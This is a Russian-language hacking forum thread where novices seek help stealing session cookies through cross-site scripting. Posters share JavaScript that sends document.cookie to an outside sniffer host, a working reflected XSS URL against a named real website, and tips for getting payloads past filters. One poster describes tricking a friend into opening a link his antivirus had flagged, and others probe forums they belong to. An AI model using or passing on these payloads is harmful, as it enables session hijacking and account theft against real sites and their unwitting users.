img = new Image(); img.src = "-------?"+document.cookie;

Куда можно вставить слово допустим hacker
Чтоб при переходе по этому скрипту это слово отобразилось в логе сниффера

обычно ставиться после .php?hacker

придет так

code:

QUERY: haker
REFERER:

в твоем случае

img = new Image(); img.src = "-------?haker"+document.cookie;

Цитата:

Сообщение от chelyuskin

обычно ставиться после .php?hacker

придет так

code:

QUERY: haker
REFERER:

в твоем случае

img = new Image(); img.src = "-------?haker"+document.cookie;

поддерживаю !

Всем доброго времени суток!!! Извеняюсь сразу,возможно не в том топике создал сообщение,но просто уже ситуация вынудила спросить...

Я новичек,прошу сильно не пинать(( Пока что изучаю,Xss атаки .. Воспользовался видео уроками Мазахакера и Сокола - очень всё доходчиво и понятно... Ноо!!!! Снифер мазахакера не работает у меня на хосте на который я его заливаю.. нету ни каких отчётов,хотя редирект происходит((
Решил попробовать онлайн снифер местный. посмотрел урок сокола вроде всё понятно.. Нашёл Хсс уязвимый сайт,как в видео уроке мазахакера, также сработал скрипт.. Ну думаю всё работает и на этом этапе у меня возникло недопонимание.. как я понял если срабатывает скрипт то Xss пассивная? также через поле поиска нашёл уязвимость..Пошёл на местный онлайн снифер и сгенерировал код (Код размещения xss фрейма на странице) влупил его,тудаже в поисковик,куки пришли мои ,что мол я там был.. сделал url для пассивной XSS с редиректом на гугл и дал кенту проверить..Сначало он мне показал скрин,что мол ссылка опасная и её спалил каспер секьюрити,но я его уболтал перейти... Его кинуло на гугл как и должно быть.. но ни куков ничего от него мне не пришло(( и я уже неделю сижу и тыкаюсь и гуглю,но всё вроде понятно в теории,а на практике какаято беда((Код для пассивной XSS атаки - куда вот его ставить я так и не могу понять до сих пор(( и какую мне ссылку нада вставлять на сайт на котором я нашёл Xss чтобы мне куки пришли,я так понимаю куки будут приходить только пользователей того сайта? и обязательно чтобы ссылка была на том сайте? И я правильно понял что сниффер местный палёвый?
Также просканировал спайдером один сервак браузерной игры , вышло что есть атака межсайтового скриптинга,пассивные там пробовал не
срабатывает скрипт,стал пихать скрипт на вставку картинки , т.к есть возможность вставлять туда и видео и ссылки и прочую инфу.. Но.... <IMG SRC=javascript:alert('XSS')> в коде вот такая вот абра-кадабра.. Залил туда просто картинку с Онлайн Снифера.. приходит отчёт когда заходят на ту страничку,но там ничего кроме ип нету (( вобщем запутался - подскажите пожалуйста,что я делаю не так...
Ещё раз извеняюсь за офф топ, но уж сильно не ругайте - тяжело в учении легко в бою)) Всем за ранее спасибо за ответ или помощ.. с ув!!!!

З.Ы вот только пересмотрел снова видео от сокола и вроде всё сделал правильно, но опять немогу понять в чём причина то((( разместил ссылку там на форуме нашёл пассивку вот ссылочка (http://goths.ru/search.php?domains=goths.ru&q=%22%3E% (https://hpc.name/redirector.html#http://goths.ru/search.php?domains=goths.ru&q=%22%3E%)) Я там тренеруюсь)))))) зарегился у них на форуме кинул ссылку туда с редиректом ... сам под этим же акком перешёл по ссылке не пришли кукисы(( а когда вставлял скрипт в пассивку то всё пришло сразу.. ((((

вот во втором сайте который штурмую)) пробовал активную xss!! подскажите это активка если теги таким образом прописались в теле форума?


Ошибка

Возникла ошибка. Если вы не уверены, что правильно используете функцию, советуем вам обратиться к нашей системе помощи за дополнительной информацией.


[#10210] Недопустимое расширение файла.


Содержимое сообщения сохранено!
Данные следующего сообщения успешно сохранены. Иногда случается, что при нажатии на кнопку «Назад» заполненные в поля данные теряются, поэтому вы можете скопировать текст и только потом вернуться на предыдущую страницу.

Содержимое сообщения сохранено!

http://www.qweqw.ru/1.jpg dynsrc=javasсriрt:alert()


Но вот окошка по срабатыванию скрипта я не видел(( Подскажите в каком направлении двигаться..

неужели так сложно подсказать? я понимаю что гугл всемогущий,но только на такие же вопросы и наталкиваюсь.. уже пробовал и кодировку в utf 7 и прочие.. но скрипт не срабатывает, в чём причина... Разве форумы созданы лишь для того чтобы "МЕГО ХАКЕРЫ" между собой общались и не помогали другим?? я не прошу ничего сверх естественного просто обьяснить в чём моя ошибка.. если заменяет спец символы , как обмануть, явно там есть уязвимости и не одна потому что на форум можно вставлять всё что хочеш коды html/xml/sql/ php и дырка факт там есть,просто немогу понять из за неопытности &quot;&gt;<script&gt;alert('XSS')&lt вот такая беда, как её обмануть? Надеюсь найдётся хоть один хакер,который обьяснить в чём моя ошибка и в какую сторону мне двигаться.. Спасибо за ранее ещё раз...

Здравствуйте,вот еще один криворукий(это я про СЕБЯ).Помогите, пожалуйста, выпрямить их.На форум,на котором общаюсь
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

вставляю bb код с картинкой.Далее, заходя туда под другой учетной записью, в логах Вашего онлайнсниффера появляется информация(айпи,браузер,ст� �аница,откуда зашли...),НО в куках почему то пусто (Query: empty).
Люди добрые,подскажите пожалуйста.В чем проблема?Заранее спасибо.

Постараюсь вам помочь(каждому)
В поиске на том сайте есть пассинвая xss, активку я искать не стал хотя там она тоже есть.Ну так вот,
code:

http://goths.ru/search.php?domains=goths.ru&q=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&sitesearch=goths.ru&sa=

Это пассивная xss, для того чтобы заточить на сниффер нужно воспользоваться JS.

source:


img
= new Image()
; img.src = 'http://snifer.ru/s.php?'+document.cookie;


Это примерно как выглядит Js изнутри
Ты должен изменить слово snifer на свой и залить этот код как фаил Js
Примерно так snifer.ru/js.js.
После делаеш так
code:



В поиске и всё.
Если ничего не понел,пиши В icq

m744na у тебя всё проще, тебе надо на сайте найти сначала xss уязвимость,ибо обычной картинкой не увести куков.

Цитата:

Сообщение от Nixx

m744na у тебя всё проще, тебе надо на сайте найти сначала xss уязвимость,ибо обычной картинкой не увести куков.

благодарю за ответ,а если при запросе в поисковой строке Спойлер
alert()

ничего не происходит,значит уязвимости xss НЕТ??? И что делать в данном случае? спасибо.

Цитата:

Сообщение от m744na

благодарю за ответ,а если при запросе в поисковой строке Спойлер
alert()

ничего не происходит,значит уязвимости xss НЕТ??? И что делать в данном случае? спасибо.

это малая часть,
их много, и начинаются с "> далее идет код
наприимер

">alert(123)
">alert(123)
тоесть начало с "> а тут уже пробуешь методом перебора
точнее читай статьи про поиск xss есть на этом форуме.

сенькс,к сожалению репу повысить не дает(наверно сообщений мало)(да и не это главное)

просканировал форум и получил следующие результаты
Спойлер
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

кто бы подсказал дальнейшие действия с полученными результатами?
p.s. кста, делаю все ЭТО только ради спортивного интереса,уж очень сильно научиться хочется...

Цитата:


кста,на том форуме я модер



Модер ты там до тех пор, пока админ того сайта не увидел эту тему))

Цитата:


получил следующие результаты



Какие результаты? Это не результат, код тупо вывелся на страницу в виде текста. Покажи html исходник той строки, где написано "alert("bla-bla-bla")"